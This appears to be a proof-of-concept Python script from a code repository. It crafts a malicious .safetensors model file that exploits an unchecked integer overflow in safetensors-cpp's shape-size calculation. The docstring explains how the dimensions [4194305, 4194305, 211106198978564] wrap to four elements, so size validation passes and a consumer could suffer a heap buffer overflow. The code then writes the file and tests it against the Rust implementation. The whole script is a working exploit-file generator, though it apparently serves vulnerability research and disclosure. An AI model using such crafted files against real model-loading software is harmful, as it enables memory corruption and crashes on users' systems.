File size: 5,607 Bytes
4c19aea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
#!/usr/bin/env python3
"""
Craft a malicious .safetensors file that exploits integer overflow in safetensors-cpp.

The safetensors format:
  - 8 bytes: header_size as little-endian uint64
  - header_size bytes: JSON header
  - remaining bytes: tensor data

The JSON header maps tensor names to {dtype, shape, data_offsets: [start, end]}.

VULNERABILITY:
safetensors-cpp's get_shape_size() multiplies shape dimensions without overflow checking:
    size_t sz = 1;
    for (size_t i = 0; i < t.shape.size(); i++) {
        sz *= t.shape[i];   // NO checked_mul!
    }

The Rust reference implementation uses checked_mul and rejects overflow.

EXPLOIT:
Shape [4194305, 4194305, 211106198978564] has true product ~3.7e27
but overflows uint64 to exactly 4. With F32 (4 bytes/element),
tensor_size = 16 bytes. Validation passes because data_offsets = [0, 16].

A consumer that trusts the shape dimensions (e.g., to allocate a buffer for
reshaping/processing) would compute 4194305 * 4194305 * 211106198978564 * 4 bytes
= a colossal allocation, or if they also overflow, get a tiny buffer that they
then write ~3.7e27 * 4 bytes into -> heap buffer overflow.
"""

import json
import struct
import sys
import os


def craft_overflow_safetensors(output_path: str):
    """Create a safetensors file with integer overflow in shape dimensions."""

    # These shape dimensions overflow uint64 to exactly 4 elements
    # 4194305 * 4194305 * 211106198978564 ≡ 4 (mod 2^64)
    # Each value fits exactly in a double (JSON number)
    shape = [4194305, 4194305, 211106198978564]

    # F32 = 4 bytes per element
    # Overflowed tensor_size = 4 * 4 = 16 bytes
    data_size = 16

    # Create the tensor data (16 bytes of actual data)
    tensor_data = b"\x41\x41\x41\x41" * 4  # 16 bytes of 'AAAA' pattern

    header = {
        "overflow_tensor": {
            "dtype": "F32",
            "shape": shape,
            "data_offsets": [0, data_size]
        }
    }

    # Serialize header to JSON
    # Use separators to minimize whitespace (matching safetensors convention)
    header_json = json.dumps(header, separators=(',', ':'))
    header_bytes = header_json.encode('utf-8')

    # Pad header to 8-byte alignment
    pad_len = (8 - len(header_bytes) % 8) % 8
    header_bytes += b' ' * pad_len

    header_size = len(header_bytes)

    # Build the file
    file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data

    with open(output_path, 'wb') as f:
        f.write(file_data)

    print(f"[+] Written malicious safetensors file: {output_path}")
    print(f"    Header size: {header_size} bytes")
    print(f"    Header JSON: {header_json}")
    print(f"    Total file size: {len(file_data)} bytes")
    print(f"    Shape: {shape}")
    print(f"    True element count: {shape[0] * shape[1] * shape[2]}")
    print(f"    Overflowed element count (mod 2^64): {(shape[0] * shape[1] * shape[2]) % (2**64)}")
    print(f"    Overflowed tensor_size (F32, 4 bytes): {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4}")
    print(f"    Actual data size: {data_size} bytes")
    print(f"    Validation tensor_size == data_size: {((shape[0] * shape[1] * shape[2]) % (2**64)) * 4 == data_size}")

    return output_path


def craft_normal_safetensors(output_path: str):
    """Create a normal (benign) safetensors file for comparison."""
    shape = [2, 2]
    data_size = 16  # 4 elements * 4 bytes (F32)
    tensor_data = struct.pack('<4f', 1.0, 2.0, 3.0, 4.0)

    header = {
        "normal_tensor": {
            "dtype": "F32",
            "shape": shape,
            "data_offsets": [0, data_size]
        }
    }

    header_json = json.dumps(header, separators=(',', ':'))
    header_bytes = header_json.encode('utf-8')
    pad_len = (8 - len(header_bytes) % 8) % 8
    header_bytes += b' ' * pad_len
    header_size = len(header_bytes)

    file_data = struct.pack('<Q', header_size) + header_bytes + tensor_data

    with open(output_path, 'wb') as f:
        f.write(file_data)

    print(f"[+] Written normal safetensors file: {output_path}")
    print(f"    Shape: {shape}, data_size: {data_size}")


def test_with_python_safetensors(filepath: str):
    """Test loading with the Python/Rust safetensors implementation."""
    try:
        from safetensors import safe_open
        print(f"\n[*] Testing with Python safetensors (Rust backend)...")
        try:
            with safe_open(filepath, framework="numpy") as f:
                for key in f.keys():
                    tensor = f.get_tensor(key)
                    print(f"    Loaded tensor '{key}': shape={tensor.shape}, dtype={tensor.dtype}")
            print("    Result: LOADED SUCCESSFULLY (unexpected for overflow file)")
        except Exception as e:
            print(f"    Result: REJECTED - {type(e).__name__}: {e}")
    except ImportError:
        print("\n[!] Python safetensors not installed, skipping Rust backend test")


if __name__ == "__main__":
    base_dir = os.path.dirname(os.path.abspath(__file__))

    # Craft the malicious file
    overflow_path = os.path.join(base_dir, "overflow_tensor.safetensors")
    craft_overflow_safetensors(overflow_path)

    # Craft a normal file for comparison
    normal_path = os.path.join(base_dir, "normal_tensor.safetensors")
    craft_normal_safetensors(normal_path)

    # Test with Python/Rust implementation
    print("\n" + "=" * 60)
    print("DIFFERENTIAL TEST: Python/Rust safetensors")
    print("=" * 60)
    print("\nNormal file:")
    test_with_python_safetensors(normal_path)
    print("\nOverflow file:")
    test_with_python_safetensors(overflow_path)